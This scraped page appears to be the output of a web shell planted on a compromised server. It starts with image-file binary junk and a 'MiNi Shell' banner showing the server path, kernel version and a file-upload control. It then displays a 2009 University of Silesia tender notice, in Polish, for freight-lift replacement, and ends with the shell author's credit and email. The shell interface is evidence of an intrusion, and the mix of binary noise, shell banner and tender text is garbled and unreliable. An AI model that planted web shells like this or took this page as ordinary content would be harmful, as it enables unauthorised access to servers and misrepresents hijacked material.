JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090512/143482-N-2009.html

<p class="kh_header"><b>Katowice: Wymiana, remont dźwigów towarowych w obiektach Uniwersytetu Śląskiego wraz z dostawą niezbędnych urządzeń i materiałów.</b><br>
<b>Numer ogłoszenia: 143482 - 2009; data zamieszczenia: 12.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Śląski w Katowicach Dział Zamówień Publicznych , ul. Bankowa 12, 40-007 Katowice, woj. śląskie, tel. 032 3592048, faks 032 3592048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.us.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana, remont dźwigów towarowych w obiektach Uniwersytetu Śląskiego wraz z dostawą niezbędnych urządzeń i materiałów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wymiana, remont dźwigów towarowych w obiektach Uniwersytetu Śląskiego wraz z dostawą niezbędnych urządzeń i materiałów..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.31.31.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Część A:  2.900,-  zł (słownie: dwa tysiące dziewięćset złotych 00/100) <BR>
Część B:  4.200,-  zł (słownie: cztery tysiące dwieście złotych 00/100) <BR>
Część C:  4.000,- zł  (słownie: cztery tysiące złotych 00/100) <BR><br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> <BR>Wykonawca musi spełniać poniższe warunki: <BR>

1. określone w art.22 ust.1 w związku z postanowieniami art.24 ustawy Prawo zamówień publicznych, <BR>

2. w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcja, spółki cywilne) - ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W celu potwierdzenia przedmiotowego warunku należy dołączyć do oferty pełnomocnictwo lub umowę zawierającą takie pełnomocnictwo, sporządzone wg. zasad, o których mowa w cz.II ust.3 SIWZ. <BR>

3. wnieść wadium w wysokości i na warunkach określonych w części IV SIWZ, <BR>

4. posiadać doświadczenie w wykonaniu co najmniej dwóch zamówień odpowiadających swoim rodzajem i wartością przedmiotowi niniejszego zamówienia w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania (tj. licząc wstecz 3 lata od dnia poprzedzającego dzień wszczęcia niniejszego postępowania). -bez względu na ile części będzie składana oferta. <BR>
Uwaga: <BR>  
Zamawiający uzna za zamówienie odpowiadające swoim rodzajem przedmiotowi niniejszego zamówienia, zamówienie,  którego przedmiotem była modernizacja lub remont lub wymiana urządzeń dźwigowych; <BR>
Zamawiający uzna za zamówienie odpowiadające swoją wartością przedmiotowi niniejszego zamówienia, zamówienie wykonane dla jednego Zleceniodawcy, którego wartość nie była niższa niż 80.000,00 PLN brutto.(każde)  <BR>
 Zamawiający uzna zamówienia, które są potwierdzone dokumentami wystawionymi na Wykonawcę. <BR>

5. posiadać uprawnienia Urzędu Dozoru Technicznego do montażu i modernizacji urządzeń dźwigowych. (dotyczy wszystkich części). <BR>

6. wykazać, iż dysponuje lub będzie dysponował osobami zdolnymi do wykonania niniejszego zamówienia tj: <BR>

6.1. co najmniej jedną osobą posiadającą uprawnienia do konserwacji urządzeń dźwigowych kategorii I-EM, wydane przez Urząd Dozoru Technicznego (łącznie dla wszystkich części). <BR>
6.2. co najmniej jedną osobą posiadającą świadectwo kwalifikacyjne E do 1 kV - uprawniające do eksploatacji urządzeń, instalacji i sieci elektrycznych w zakresie obsługi, konserwacji, montażu, kontrolno-pomiarowym - na stanowisku eksploatacji (łącznie dla wszystkich części). <BR>
6.3. co najmniej jedną osobą posiadającą świadectwo kwalifikacyjne D do kV - uprawniające do eksploatacji urządzeń, instalacji i sieci elektrycznych w zakresie obsługi, konserwacji, montażu, kontrolno-pomiarowym - na stanowisku dozoru (łącznie dla wszystkich części). <BR>
6.4.  co najmniej jedną osobą posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej upoważniające do kierowania, nadzorowania i kontrolowania oraz oceniania i badania stanu technicznego budynków i budowli o powszechnie znanych rozwiązaniach,  <BR>
wraz z aktualnym dokumentem potwierdzającym przynależność do właściwej Izby Samorządu Zawodowego (Okręgowa Izba Inżynierów Budownictwa). (łącznie dla wszystkich części). <BR>
 
7. posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie działalności firmy Wykonawcy     (OC deliktowe) na minimalną kwotę 500.000,00 PLN (słownie: pięćset tysięcy złotych) -bez względu na ile części będzie składana oferta. <BR>

Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, musi spełnić warunki, o których mowa w pkt. 1, warunki wymienione w pozostałych punktach muszą spełniać Wykonawcy w taki sposób, aby wykazać spełnienie danego warunku łącznie. <BR>
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia//niespełnia na podstawie dokumentów i oświadczeń dołaczonych do oferty. <BR>.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> <BR>W celu potwierdzenia spełniania ww. warunków wraz z ofertą Wykonawca winien złożyć niżej wymienione dokumenty: <BR>
  
8.  oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z załącznikiem nr 1b do  Specyfikacji (Zamawiający dopuszcza odtworzenie tekstu oświadczenia), <BR>

9.  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. <BR>

Zamawiający przyjmie jako aktualne dokumenty, o których mowa w punkcie 9, jeżeli ich data wydania lub potwierdzenia za zgodność ze stanem faktycznym przez wydającego dany dokument nie będzie wcześniejsza niż 6 miesięcy przed datą składania ofert. <BR>

W przypadku zaistnienia zmian, nie odzwierciedlonych w w/w dokumentach,
Wykonawca obowiązany jest załączyć do oferty dokumenty będące podstawą tychże zmian.
(np. uchwała wspólników, prawomocny wyrok sądowy). <BR>

W przypadku Wykonawcy mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej w przypadku pkt.9, zastosowanie ma przepis §2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane.( Dz. U. z dnia 24 maja 2006 r. Nr 87 poz. 605 ze zmianami.). <BR>

10. wykaz wykonanych zamówień w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością przedmiotowi niniejszego zamówienia , z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te zamówienia zostały wykonane należycie (np. referencje). Wykaz musi być zgodny z Załącznikiem nr 1c (Zamawiający dopuszcza odtworzenie tekstu formularza) do SIWZ, <BR>

11. dokument potwierdzający, iż Wykonawca posiada uprawnienia Urzędu Dozoru Technicznego do montażu i modernizacji urządzeń dźwigowych (łącznie dla wszystkich części), <BR> <BR>                                                                                                         12. wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca, i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, zgodny z Załącznikiem nr 1d (Zamawiający dopuszcza odtworzenie tekstu formularza) do  SIWZ, <BR>

12.1. lub pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania  zamówienia, jeżeli w wykazie, o którym mowa w pkt.12 Wykonawca wskazał osoby, którymi będzie dysponował, <BR>

13. dokumenty potwierdzające, iż osoby które będą wykonywać niniejsze zamówienia, posiadają    wymagane przez Zamawiającego kwalifikacje tj. <BR>

13.1. uprawnienia do konserwacji urządzeń dźwigowych kategorii I - EM, wydane przez Urząd Dozoru  Technicznego (łącznie dla wszystkich części)., <BR>
13.2 aktualne świadectwo kwalifikacyjne E do 1 kV - uprawniające do eksploatacji urządzeń, instalacji i sieci elektrycznych w zakresie obsługi , konserwacji , montażu, kontrolno-pomiarowym - na stanowisku eksploatacji (łącznie dla wszystkich części), <BR>
13.3. aktualne świadectwo kwalifikacyjne D do 1 kV - uprawniające do eksploatacji urządzeń, instalacji i sieci elektrycznych w zakresie obsługi , konserwacji , montażu, kontrolno-pomiarowym - na stanowisku dozoru (łącznie dla wszystkich części), <BR>
13.4. uprawnienia budowlane w zakresie specjalności konstrukcyjno-budowlanej upoważniające do kierowania, nadzorowania i kontrolowania oraz oceniania i badania stanu technicznego budynków i budowli o powszechnie znanych rozwiązaniach, wraz z aktualnym dokumentem potwierdzającymi przynależność do właściwej Izby Inżynierów Budownictwa, (łącznie dla wszystkich części). <BR>

14. polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie działalności firmy Wykonawcy (OC deliktowe), na sumę ubezpieczenia, o której mowa w pkt.7 (bez względu na ile części jest składana oferta). <BR>

Jeżeli z ww. dokumentu nie wynika, ze składka została opłacona, Wykonawca winien dołączyć potwierdzenie jej opłaty lub opłaty raty składki wymagalnej na dzień otwarcia ofert. <BR>
Polisa winna być aktualna (ważna) na dzień składania i otwarcia ofert.
Wykonawca winien posiadać w/w ubezpieczenie przez cały okres wykonywania zamówienia. <BR>
Ze względu na specyfikę zawierania umów ubezpieczeniowych, obejmujących okresy nie dłuższe niż jeden rok, dopuszczalne jest, po podpisaniu umowy, sukcesywne przedstawianie dowodów opłacenia polisy. <BR>

Dokumenty wymienione w pkt. 9 - 14, należy dostarczyć w oryginale lub wyraźnej, czytelnej  kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. <BR>

W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, oświadczenie, o którym mowa w punkcie 8 musi dotyczyć wszystkich podmiotów łącznie. <BR>

W celu potwierdzenia spełnienia warunków wymaganych od Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokumenty wymienione w pkt.9 muszą być złożone przez każdego wykonawcę , a dokumenty wymienione w pozostałych punktach muszą złożyć Wykonawcy, których te dokumenty dotyczą,  w taki sposób, aby wykazać spełnienie danego warunku łącznie. <BR>

Zamawiający żąda, aby dokumenty sporządzone w języku obcym były składane wraz z tłumaczeniami na język polski, poświadczonymi przez Wykonawcę. <BR>.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.us.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> <BR>Dział Zamówien Publicznych Uniwersytetu Śląskiego <BR>
40-007 Katowice, ul. Bankowa 12 pok. 69 IIIp.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2009 godzina 09:30, miejsce: <BR>Dział Zamówien Publicznych Uniwersytetu Śląskiego <BR>
40-007 Katowice, ul. Bankowa 12 pok. 69 IIIp.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 20.06.2009.</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wymiana, remont dźwigów towarowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana, remont dźwigów towarowych w obiektach Uniwersytetu Śląskiego wraz z dostawą niezbędnych urządzeń i materiałów..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.31.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 112.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana, remont dźwigów towarowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana, remont dźwigów towarowych w obiektach Uniwersytetu Śląskiego wraz z dostawą niezbędnych urządzeń i materiałów..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.31.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 126.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wymiana, remont dźwigów towarowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana, remont dźwigów towarowych w obiektach Uniwersytetu Śląskiego wraz z dostawą niezbędnych urządzeń i materiałów..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.31.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 126.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com